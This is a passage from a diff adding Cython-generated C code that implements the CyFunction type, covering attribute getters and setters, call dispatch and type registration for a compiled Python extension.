{ + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_name, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_qualname); + return op->func_qualname; +} +static int +__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_qualname, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_dict == NULL)) { + op->func_dict = PyDict_New(); + if (unlikely(op->func_dict == NULL)) + return NULL; + } + Py_INCREF(op->func_dict); + return op->func_dict; +} +static int +__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(value == NULL)) { + PyErr_SetString(PyExc_TypeError, + "function's dictionary may not be deleted"); + return -1; + } + if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "setting function's dictionary to a non-dict"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_dict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_globals); + return op->func_globals; +} +static PyObject * +__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(op); + CYTHON_UNUSED_VAR(context); + Py_INCREF(Py_None); + return Py_None; +} +static PyObject * +__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) +{ + PyObject* result = (op->func_code) ? op->func_code : Py_None; + CYTHON_UNUSED_VAR(context); + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { + int result = 0; + PyObject *res = op->defaults_getter((PyObject *) op); + if (unlikely(!res)) + return -1; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + op->defaults_tuple = PyTuple_GET_ITEM(res, 0); + Py_INCREF(op->defaults_tuple); + op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); + Py_INCREF(op->defaults_kwdict); + #else + op->defaults_tuple = PySequence_ITEM(res, 0); + if (unlikely(!op->defaults_tuple)) result = -1; + else { + op->defaults_kwdict = PySequence_ITEM(res, 1); + if (unlikely(!op->defaults_kwdict)) result = -1; + } + #endif + Py_DECREF(res); + return result; +} +static int +__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__defaults__ must be set to a tuple object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_tuple; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_tuple; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__kwdefaults__ must be set to a dict object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_kwdict; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_kwdict; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value || value == Py_None) { + value = NULL; + } else if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__annotations__ must be set to a dict object"); + return -1; + } + Py_XINCREF(value); + __Pyx_Py_XDECREF_SET(op->func_annotations, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->func_annotations; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + result = PyDict_New(); + if (unlikely(!result)) return NULL; + op->func_annotations = result; + } + Py_INCREF(result); + return result; +} +static PyObject * +__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { + int is_coroutine; + CYTHON_UNUSED_VAR(context); + if (op->func_is_coroutine) { + return __Pyx_NewRef(op->func_is_coroutine); + } + is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; +#if PY_VERSION_HEX >= 0x03050000 + if (is_coroutine) { + PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; + fromlist = PyList_New(1); + if (unlikely(!fromlist)) return NULL; + Py_INCREF(marker); + PyList_SET_ITEM(fromlist, 0, marker); + module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); + Py_DECREF(fromlist); + if (unlikely(!module)) goto ignore; + op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); + Py_DECREF(module); + if (likely(op->func_is_coroutine)) { + return __Pyx_NewRef(op->func_is_coroutine); + } +ignore: + PyErr_Clear(); + } +#endif + op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); + return __Pyx_NewRef(op->func_is_coroutine); +} +static PyGetSetDef __pyx_CyFunction_getsets[] = { + {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, + {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, + {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, + {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, + {0, 0, 0, 0, 0} +}; +static PyMemberDef __pyx_CyFunction_members[] = { + {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, +#if CYTHON_METH_FASTCALL +#if CYTHON_BACKPORT_VECTORCALL + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, +#else + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, +#endif +#endif +#if PY_VERSION_HEX < 0x030500A0 + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, +#else + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, +#endif +#endif + {0, 0, 0, 0, 0} +}; +static PyObject * +__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) +{ + CYTHON_UNUSED_VAR(args); +#if PY_MAJOR_VERSION >= 3 + Py_INCREF(m->func_qualname); + return m->func_qualname; +#else + return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); +#endif +} +static PyMethodDef __pyx_CyFunction_methods[] = { + {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, + {0, 0, 0, 0} +}; +#if PY_VERSION_HEX < 0x030500A0 +#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) +#else +#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) +#endif +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyCFunctionObject *cf = (PyCFunctionObject*) op; + if (unlikely(op == NULL)) + return NULL; + op->flags = flags; + __Pyx_CyFunction_weakreflist(op) = NULL; + cf->m_ml = ml; + cf->m_self = (PyObject *) op; + Py_XINCREF(closure); + op->func_closure = closure; + Py_XINCREF(module); + cf->m_module = module; + op->func_dict = NULL; + op->func_name = NULL; + Py_INCREF(qualname); + op->func_qualname = qualname; + op->func_doc = NULL; +#if PY_VERSION_HEX < 0x030900B1 + op->func_classobj = NULL; +#else + ((PyCMethodObject*)op)->mm_class = NULL; +#endif + op->func_globals = globals; + Py_INCREF(op->func_globals); + Py_XINCREF(code); + op->func_code = code; + op->defaults_pyobjects = 0; + op->defaults_size = 0; + op->defaults = NULL; + op->defaults_tuple = NULL; + op->defaults_kwdict = NULL; + op->defaults_getter = NULL; + op->func_annotations = NULL; + op->func_is_coroutine = NULL; +#if CYTHON_METH_FASTCALL + switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { + case METH_NOARGS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; + break; + case METH_O: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; + break; + case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; + break; + case METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; + break; + case METH_VARARGS | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = NULL; + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + Py_DECREF(op); + return NULL; + } +#endif + return (PyObject *) op; +} +static int +__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) +{ + Py_CLEAR(m->func_closure); + Py_CLEAR(((PyCFunctionObject*)m)->m_module); + Py_CLEAR(m->func_dict); + Py_CLEAR(m->func_name); + Py_CLEAR(m->func_qualname); + Py_CLEAR(m->func_doc); + Py_CLEAR(m->func_globals); + Py_CLEAR(m->func_code); +#if PY_VERSION_HEX < 0x030900B1 + Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); +#else + { + PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; + ((PyCMethodObject *) (m))->mm_class = NULL; + Py_XDECREF(cls); + } +#endif + Py_CLEAR(m->defaults_tuple); + Py_CLEAR(m->defaults_kwdict); + Py_CLEAR(m->func_annotations); + Py_CLEAR(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_XDECREF(pydefaults[i]); + PyObject_Free(m->defaults); + m->defaults = NULL; + } + return 0; +} +static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + if (__Pyx_CyFunction_weakreflist(m) != NULL) + PyObject_ClearWeakRefs((PyObject *) m); + __Pyx_CyFunction_clear(m); + __Pyx_PyHeapTypeObject_GC_Del(m); +} +static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + PyObject_GC_UnTrack(m); + __Pyx__CyFunction_dealloc(m); +} +static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) +{ + Py_VISIT(m->func_closure); + Py_VISIT(((PyCFunctionObject*)m)->m_module); + Py_VISIT(m->func_dict); + Py_VISIT(m->func_name); + Py_VISIT(m->func_qualname); + Py_VISIT(m->func_doc); + Py_VISIT(m->func_globals); + Py_VISIT(m->func_code); + Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); + Py_VISIT(m->defaults_tuple); + Py_VISIT(m->defaults_kwdict); + Py_VISIT(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_VISIT(pydefaults[i]); + } + return 0; +} +static PyObject* +__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) +{ +#if PY_MAJOR_VERSION >= 3 + return PyUnicode_FromFormat("", + op->func_qualname, (void *)op); +#else + return PyString_FromFormat("", + PyString_AsString(op->func_qualname), (void *)op); +#endif +} +static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { + PyCFunctionObject* f = (PyCFunctionObject*)func; + PyCFunction meth = f->m_ml->ml_meth; + Py_ssize_t size; + switch (f->m_ml->ml_flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { + case METH_VARARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) + return (*meth)(self, arg); + break; + case METH_VARARGS | METH_KEYWORDS: + return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); + case METH_NOARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 0)) + return (*meth)(self, NULL); + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + case METH_O: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 1)) { + PyObject *result, *arg0; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + arg0 = PyTuple_GET_ITEM(arg, 0); + #else + arg0 = PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; + #endif + result = (*meth)(self, arg0); + #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(arg0); + #endif + return result; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + return NULL; + } + PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", + f->m_ml->ml_name); + return NULL; +} +static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { + return __Pyx_CyFunction_CallMethod(func, ((PyCFunctionObject*)func)->m_self, arg, kw); +} +static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { + PyObject *result; + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; +#if CYTHON_METH_FASTCALL + __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); + if (vc) { +#if CYTHON_ASSUME_SAFE_MACROS + return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); +#else + (void) &__Pyx_PyVectorcall_FastCallDict; + return PyVectorcall_Call(func, args, kw); +#endif + } +#endif + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + Py_ssize_t argc; + PyObject *new_args; + PyObject *self; + argc = PyTuple_GET_SIZE(args); + new_args = PyTuple_GetSlice(args, 1, argc); + if (unlikely(!new_args)) + return NULL; + self = PyTuple_GetItem(args, 0); + if (unlikely(!self)) { + Py_DECREF(new_args); +#if PY_MAJOR_VERSION > 2 + PyErr_Format(PyExc_TypeError, + "unbound method %.200S() needs an argument", + cyfunc->func_qualname); +#else + PyErr_SetString(PyExc_TypeError, + "unbound method needs an argument"); +#endif + return NULL; + } + result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); + Py_DECREF(new_args); + } else { + result = __Pyx_CyFunction_Call(func, args, kw); + } + return result; +} +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) +{ + int ret = 0; + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + if (unlikely(nargs < 1)) { + PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", + ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + ret = 1; + } + if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + return ret; +} +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 0)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, NULL); +} +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 1)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, args[0]); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; + PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); +} +#endif +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_CyFunctionType_slots[] = { + {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, + {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, + {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, + {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, + {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, + {Py_tp_methods, (void *)__pyx_CyFunction_methods}, + {Py_tp_members, (void *)__pyx_CyFunction_members}, + {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, + {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, + {0, 0}, +}; +static PyType_Spec __pyx_CyFunctionType_spec = { + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + __pyx_CyFunctionType_slots +}; +#else +static PyTypeObject __pyx_CyFunctionType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, + (destructor) __Pyx_CyFunction_dealloc, +#if !CYTHON_METH_FASTCALL + 0, +#elif CYTHON_BACKPORT_VECTORCALL + (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), +#else + offsetof(PyCFunctionObject, vectorcall), +#endif + 0, + 0, +#if PY_MAJOR_VERSION < 3 + 0, +#else + 0, +#endif + (reprfunc) __Pyx_CyFunction_repr, + 0, + 0, + 0, + 0, + __Pyx_CyFunction_CallAsMethod, + 0, + 0, + 0, + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#ifdef _Py_TPFLAGS_HAVE_VECTORCALL + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + 0, + (traverseproc) __Pyx_CyFunction_traverse, + (inquiry) __Pyx_CyFunction_clear, + 0, +#if PY_VERSION_HEX < 0x030500A0 + offsetof(__pyx_CyFunctionObject, func_weakreflist), +#else + offsetof(PyCFunctionObject, m_weakreflist), +#endif + 0, + 0, + __pyx_CyFunction_methods, + __pyx_CyFunction_members, + __pyx_CyFunction_getsets, + 0, + 0, + __Pyx_PyMethod_New, + 0, + offsetof(__pyx_CyFunctionObject, func_dict), + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_CyFunction_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); +#endif + if (unlikely(__pyx_CyFunctionType == NULL)) { + return -1; + } + return 0; +} +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults = PyObject_Malloc(size); + if (unlikely(!m->defaults)) + return PyErr_NoMemory(); + memset(m->defaults, 0, size); + m->defaults_pyobjects = pyobjects; + m->defaults_size = size; + return m->defaults; +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_tuple = tuple; + Py_INCREF(tuple); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_kwdict = dict; + Py_INCREF(dict); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->func_annotations = dict; + Py_INCREF(dict); +} + +/* CythonFunction */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyObject *op = __Pyx_CyFunction_Init( + PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), + ml, flags, qualname, closure, module, globals, code + ); + if (likely(op)) { + PyObject_GC_Track(op); + } + return op; +} + +/* PyObjectCall2Args */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call2Args(PyObject* function, PyObject* arg1, PyObject* arg2) { + PyObject *args[3] = {NULL, arg1, arg2}; + return __Pyx_PyObject_FastCall(function, args+1, 2 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectLookupSpecial */ +#if CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx__PyObject_LookupSpecial(PyObject* obj, PyObject* attr_name, int with_error) { + PyObject *res; + PyTypeObject *tp = Py_TYPE(obj); +#if PY_MAJOR_VERSION < 3 + if (unlikely(PyInstance_Check(obj))) + return with_error ? __Pyx_PyObject_GetAttrStr(obj, attr_name) : __Pyx_PyObject_GetAttrStrNoError(obj, attr_name); +#endif + res = _PyType_Lookup(tp, attr_name); + if (likely(res)) { + descrgetfunc f = Py_TYPE(res)->tp_descr_get; + if (!f) { + Py_INCREF(res); + } else { + res = f(res, obj, (PyObject *)tp); + } + } else if (with_error) { + PyErr_SetObject(PyExc_AttributeError, attr_name); + } + return res; +} +#endif + +/* Py3ClassCreate */ +static PyObject *__Pyx_Py3MetaclassPrepare(PyObject *metaclass, PyObject *bases, PyObject *name, + PyObject *qualname, PyObject *mkw, PyObject 